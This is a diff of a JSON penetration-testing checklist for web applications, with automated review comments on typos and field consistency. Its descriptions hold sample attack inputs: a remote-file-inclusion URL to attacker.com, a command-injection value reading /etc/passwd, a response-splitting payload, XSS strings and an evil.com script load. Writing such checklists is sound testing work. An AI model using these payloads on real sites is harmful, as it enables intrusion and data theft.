  "key": "local_file_inclusion",
432
569
  "title": "Testing for Local File Inclusion",
433
- "description": ""
570
+ "caption": "",
571
+ "description": "LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)",
572
+ "tools": "Burp Proxy, fimap, Liffy"
434
573
  },
435
574
  {
436
575
  "key": "remote_file_inclusion",
437
576
  "title": "Testing for Remote File Inclusion",
438
- "description": ""
577
+ "caption": "",
578
+ "description": "RFI from malicious URL ?page.php?file=http://attacker.com/malicious_page",
579
+ "tools": "Burp Proxy, fimap, Liffy"
439
580
  },
440
581
  {
441
582
  "key": "command_injection",
442
583
  "title": "Testing for Command Injection",
443
- "description": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
584
+ "caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
585
+ "description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
586
+ "tools": "Burp Proxy, ZAP, Commix",
444
587
  "vrt_category": "server_side_injection"
445
588
  },
446
589
  {
447
590
  "key": "buffer_overflow",
448
591
  "title": "Testing for Buffer overflow",
449
- "description": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
592
+ "caption": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
593
+ "description": "Testing for heap overflow vulnerability\nTesting for stack overflow vulnerability\nTesting for format string vulnerability",
594
+ "tools": "Immunity Canvas, Spike, MSF, Nessus",
450
595
  "vrt_category": "server_side_injection"
451
596
  },
452
597
  {
453
598
  "key": "heap_overflow",
454
599
  "title": "Testing for Heap overflow",
455
- "description": ""
600
+ "caption": "",
601
+ "description": "",
602
+ "tools": ""
456
603
  },
457
604
  {
458
605
  "key": "stack_overflow",
459
606
  "title": "Testing for Stack overflow",
460
- "description": ""
607
+ "caption": "",
608
+ "description": "",
609
+ "tools": ""
461
610
  },
462
611
  {
463
612
  "key": "format_string",
464
613
  "title": "Testing for Format string",
465
- "description": ""
614
+ "caption": "",
615
+ "description": "",
616
+ "tools": ""
466
617
  },
467
618
  {
468
619
  "key": "incubated_vulnerabilities",
469
620
  "title": "Testing for incubated vulnerabilities",
470
- "description": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
621
+ "caption": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
622
+ "description": "File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)",
623
+ "tools": "Burp Proxy, BeEF, MSF",
471
624
  "vrt_category": "server_security_misconfiguration"
472
625
  },
473
626
  {
474
627
  "key": "http_splitting_and_smuggling",
475
628
  "title": "Testing for HTTP Splitting/Smuggling",
476
- "description": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
629
+ "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
630
+ "description": "param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>",
631
+ "tools": "Burp Proxy, ZAP, netcat",
477
632
  "vrt_category": "server_side_injection"
478
633
  }
479
634
  ]
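Review bot: The new description for the `nosql_injection` item is misspelled — `"description": "dentify NoSQL databases, Pass special characters ..."` should begin `"Identify NoSQL databases, ..."`. Separately, the three entries `heap_overflow`, `stack_overflow` and `format_string` set `caption`, `description` and `tools` all to `""`, whereas elsewhere in this file a field without a value is simply omitted (several items carry no `vrt_category` at all); pick one absent-value policy for the document, and since the `buffer_overflow` item already lists those three tests in its own description, either fill these placeholders in or drop them rather than shipping empty strings that consumers must special-case. The closing brace of the `data_validation` group lies outside this hunk.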
@@ -482,17 +637,22 @@
482
637
  "key": "error_handling",
483
638
  "title": "Error handling",
484
639
  "description": "",
640
+ "type": "checklist",
485
641
  "items": [
486
642
  {
487
643
  "key": "error_codes",
488
644
  "title": "Analysis of Error Codes",
489
- "description": "OTG-ERR-001, WAHHM - Recon and Analysis",
645
+ "caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
646
+ "description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
647
+ "tools": "Burp Proxy, ZAP",
490
648
  "vrt_category": "server_security_misconfiguration"
491
649
  },
492
650
  {
493
651
  "key": "stack_traces",
494
652
  "title": "Analysis of Stack Traces",
495
- "description": "OTG-ERR-002, WAHHM - Recon and Analysis",
653
+ "caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
654
+ "description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
655
+ "tools": "Burp Proxy, ZAP",
496
656
  "vrt_category": "server_security_misconfiguration"
497
657
  }
498
658
  ]
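Review bot: The new `tools` fields are comma-separated strings (`"tools": "Burp Proxy, ZAP"` on both error_handling items, and the same shape throughout the cryptography, business_logic and client_side hunks), so every consumer has to re-split them and a tool name containing a comma cannot be represented; an array such as `"tools": ["Burp Proxy", "ZAP"]` keeps the list structured, assuming the checklist renderer can accept an array. The error_codes description also reads `from that errors`, which should be `from those errors`. The enclosing `error_handling` object opens before this hunk.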
@@ -501,23 +661,30 @@
501
661
  "key": "cryptography",
502
662
  "title": "Cryptography",
503
663
  "description": "",
664
+ "type": "checklist",
504
665
  "items": [
505
666
  {
506
667
  "key": "transport_layer_protection",
507
668
  "title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
508
- "description": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
669
+ "caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
670
+ "description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
671
+ "tools": "testssl.sh, SSL Breacher",
509
672
  "vrt_category": "server_security_misconfiguration"
510
673
  },
511
674
  {
512
675
  "key": "padding_oracle",
513
676
  "title": "Testing for Padding Oracle",
514
- "description": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
677
+ "caption": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
678
+ "description": "Compare the responses in three different states:\nCipher text gets decrypted, resulting data is correct.\nCipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.\nCipher text decryption fails due to padding errors.",
679
+ "tools": "PadBuster, Poracle, python-paddingoracle, POET",
515
680
  "vrt_category": "broken_authentication_and_session_management"
516
681
  },
517
682
  {
518
683
  "key": "unencrypted_channels",
519
684
  "title": "Testing for Sensitive information sent via unencrypted channels",
520
- "description": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
685
+ "caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
686
+ "description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
687
+ "tools": "Burp Proxy, ZAP, Curl",
521
688
  "vrt_category": "broken_authentication_and_session_management"
522
689
  }
523
690
  ]
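Review bot: The transport_layer_protection description lists `RC4, BEAST, CRIME, POODLE` as "weak ciphers/protocols", but only RC4 is a cipher; BEAST, CRIME and POODLE are names of attacks against TLS/SSL configurations, so the checklist item conflates what to enumerate with what to assess exposure to. A clearer wording would be `"description": "Identify SSL/TLS services, enumerate weak protocol versions and cipher suites (e.g. SSLv3, RC4, export-grade suites), and check exposure to known attacks such as BEAST, CRIME and POODLE"`. The abbreviation `ie.` there should be `e.g.` since the list is illustrative. The enclosing `cryptography` object opens before this hunk.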
@@ -526,57 +693,76 @@
526
693
  "key": "business_logic",
527
694
  "title": "Business Logic Testing",
528
695
  "description": "",
696
+ "type": "checklist",
529
697
  "items": [
530
698
  {
531
699
  "key": "data_validation",
532
700
  "title": "Test Business Logic Data Validation",
533
- "description": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
701
+ "caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
702
+ "description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
703
+ "tools": "Burp Proxy, ZAP",
534
704
  "vrt_category": "broken_access_control"
535
705
  },
536
706
  {
537
707
  "key": "forge_requests",
538
708
  "title": "Test Ability to Forge Requests",
539
- "description": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
709
+ "caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
710
+ "description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
711
+ "tools": "Burp Proxy, ZAP",
540
712
  "vrt_category": "server_side_injection"
541
713
  },
542
714
  {
543
715
  "key": "integrity_check",
544
716
  "title": "Test Integrity Checks",
545
- "description": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
717
+ "caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
718
+ "description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
719
+ "tools": "Burp Proxy, ZAP",
546
720
  "vrt_category": "broken_access_control"
547
721
  },
548
722
  {
549
723
  "key": "process_timing",
550
724
  "title": "Test for Process Timing",
551
- "description": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
725
+ "caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
726
+ "description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
727
+ "tools": "Burp Proxy, ZAP",
552
728
  "vrt_category": "server_side_injection"
553
729
  },
554
730
  {
555
731
  "key": "usage_limits",
556
732
  "title": "Test Number of Times a Function Can be Used Limits",
557
- "description": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
733
+ "caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
734
+ "description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
735
+ "tools": "Burp Proxy, ZAP",
558
736
  "vrt_category": "broken_access_control"
559
737
  },
560
738
  {
561
739
  "key": "workflow_circumvention",
562
740
  "title": "Testing for the Circumvention of Work Flows",
563
- "description": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
741
+ "caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
742
+ "description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
743
+ "tools": "Burp Proxy, ZAP",
564
744
  "vrt_category": "broken_access_control"
565
745
  },
566
746
  {
567
747
  "key": "application_misuse",
568
748
  "title": "Test Defenses Against Application Mis-use",
569
- "description": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws"
749
+ "caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
750
+ "description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
751
+ "tools": "Burp Proxy, ZAP"
570
752
  },
571
753
  {
572
754
  "key": "upload_unexpected_files",
573
755
  "title": "Test Upload of Unexpected File Types",
574
- "description": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws"
756
+ "caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
757
+ "description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
758
+ "tools": "Burp Proxy, ZAP"
575
759
  },
576
760
  {
577
761
  "key": "malicious_files",
578
762
  "title": "Test Upload of Malicious Files",
579
- "description": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
763
+ "caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
764
+ "description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
765
+ "tools": "Burp Proxy, ZAP",
580
766
  "vrt_category": "server_security_misconfiguration"
581
767
  }
582
768
  ]
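Review bot: The new integrity_check description contains two copy errors, `insert, update or edit delete the data` and `users that .should not be allowed`; it should read `insert, update or delete the data` and `users that should not be allowed`. The malicious_files description also starts with a leading space (`" Develop or acquire …"`), which will show up in any rendered output and differs from every other description in the file. The enclosing `business_logic` object opens before this hunk.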
@@ -585,78 +771,115 @@
585
771
  "key": "client_side",
586
772
  "title": "Client Side Testing",
587
773
  "description": "",
774
+ "type": "checklist",
588
775
  "items": [
589
776
  {
590
777
  "key": "dom_based_xss",
591
778
  "title": "Testing for DOM based Cross Site Scripting",
592
- "description": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
779
+ "caption": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
780
+ "description": "Test for the user inputs obtained from client-side JavaScript Objects",
781
+ "tools": "Burp Proxy, DOMinator",
593
782
  "vrt_category": "cross_site_scripting_xss"
594
783
  },
595
784
  {
596
785
  "key": "javascript_execution",
597
786
  "title": "Testing for JavaScript Execution",
598
- "description": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
787
+ "caption": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
788
+ "description": "Inject JavaScript code:\nwww.victim.com/?javascript:alert(1)",
789
+ "tools": "Burp Proxy, ZAP",
599
790
  "vrt_category": "cross_site_scripting_xss"
600
791
  },
601
792
  {
602
793
  "key": "html_injection",
603
794
  "title": "Testing for HTML Injection",
604
- "description": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
795
+ "caption": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
796
+ "description": "Send malicious HTML code:\n?user=<img%20src='aaa'%20onerror=alert(1)>",
797
+ "tools": "Burp Proxy, ZAP",
605
798
  "vrt_category": "server_side_injection"
606
799
  },
607
800
  {
608
801
  "key": "url_redirect",
609
802
  "title": "Testing for Client Side URL Redirect",
610
- "description": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
803
+ "caption": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
804
+ "description": "Modify untrusted URL input to a malicious site:\n(Open Redirect)?redirect=www.fake-target.site",
805
+ "tools": "Burp Proxy, ZAP",
611
806
  "vrt_category": "unvalidated_redirects_and_forwards"
612
807
  },
613
808
  {
614
809
  "key": "css_injection",
615
810
  "title": "Testing for CSS Injection",
616
- "description": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
811
+ "caption": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
812
+ "description": "nject code in the CSS context :\nwww.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])\nwww.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)",
813
+ "tools": "Burp Proxy, ZAP",
617
814
  "vrt_category": "server_security_misconfiguration"
618
815
  },
619
816
  {
620
817
  "key": "resource_manipulation",
621
818
  "title": "Testing for Client Side Resource Manipulation",
622
- "description": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
819
+ "caption": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
820
+ "description": "External JavaScript could be easily injected in the trusted web site\nwww.victim.com/#http://evil.com/js.js",
821
+ "tools": "Burp Proxy, ZAP",
623
822
  "vrt_category": "server_security_misconfiguration"
624
823
  },
625
824
  {
626
825
  "key": "cors",
627
826
  "title": "Test Cross Origin Resource Sharing",
628
- "description": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
827
+ "caption": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
828
+ "description": "Check the HTTP headers in order to understand how CORS is used (Origin Header)",
829
+ "tools": "Burp Proxy, ZAP",
629
830
  "vrt_category": "server_security_misconfiguration"
630
831
  },
631
832
  {
632
833
  "key": "cross_site_flashing",
633
834
  "title": "Testing for Cross Site Flashing",
634
- "description": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
835
+ "caption": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
836
+ "description": "Decompile, Undefined variables, Unsafe methods, Include malicious SWF http://victim/file.swf?lang=http://evil",
837
+ "tools": "FlashBang, Flare, Flasm, SWFScan, SWF Intruder",
635
838
  "vrt_category": "server_security_misconfiguration"
636
839
  },
637
840
  {
638
841
  "key": "clickjacking",
639
842
  "title": "Testing for Clickjacking",
640
- "description": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
843
+ "caption": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
844
+ "description": "Discover if a website is vulnerable by loading into an iframe, create a simple web page that includes a frame containing the target.",
845
+ "tools": "Burp Proxy",
641
846
  "vrt_category": "server_security_misconfiguration"
642
847
  },
643
848
  {
644
849
  "key": "web_sockets",
645
850
  "title": "Testing WebSockets",
646
- "description": "OTG-CLIENT-010, WAHHM - Test Handling of Input"
851
+ "caption": "OTG-CLIENT-010, WAHHM - Test Handling of Input",
852
+ "description": "Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.\nUse Google Chrome's Developer Tools to view the Network WebSocket communication.\nCheck Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization",
853
+ "tools": "Burp Proxy, Chrome, ZAP, WebSocket Client"
647
854
  },
648
855
  {
649
856
  "key": "web_messaging",
650
857
  "title": "Test Web Messaging",
651
- "description": "OTG-CLIENT-011, WAHHM - Test Handling of Input"
858
+ "caption": "OTG-CLIENT-011, WAHHM - Test Handling of Input",
859
+ "description": "Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains",
860
+ "tools": "Burp Proxy, ZAP"
652
861
  },
653
862
  {
654
863
  "key": "local_storage",
655
864
  "title": "Test Local Storage",
656
- "description": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
657
- "vrt_category": "server_security_misconfiguration"
865
+ "caption": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
866
+ "vrt_category": "server_security_misconfiguration",
867
+ "description": "Determine whether the website is storing sensitive data in the storage.\nXSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>",
868
+ "tools": "Chrome, Firebug, Burp Proxy, ZAP"
658
869
  }
659
870
  ]
871
+ },
872
+ {
873
+ "key": "upload_logs",
874
+ "title": "Upload logs",
875
+ "description": "This should include all associated traffic associated to the in-scope targets.",
876
+ "type": "large_upload"
877
+ },
878
+ {
879
+ "key": "executive_summary",
880
+ "title": "Executive summary",
881
+ "description": "The executive summary should be written with a high-level view of both risk and business impact. It should be concise and clear, therefore it is important to use plain English. This ensures that non-technical readers can gain insight into security concerns outlined in your report.",
882
+ "type": "executive_summary"
660
883
  }
661
884
  ]
662
885
  }
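Review bot: The css_injection description is missing its first letter, `nject code in the CSS context :` should be `Inject code in the CSS context:`. The local_storage item is the only one in the file where `vrt_category` is placed before `description` and `tools`; key order is not significant to a parser, but keeping `vrt_category` last as in every other item makes the diff and any hand edits easier to read. The new upload_logs description also doubles a word, `all associated traffic associated to the in-scope targets` should be `all traffic associated with the in-scope targets`. The enclosing `client_side` object opens before this hunk.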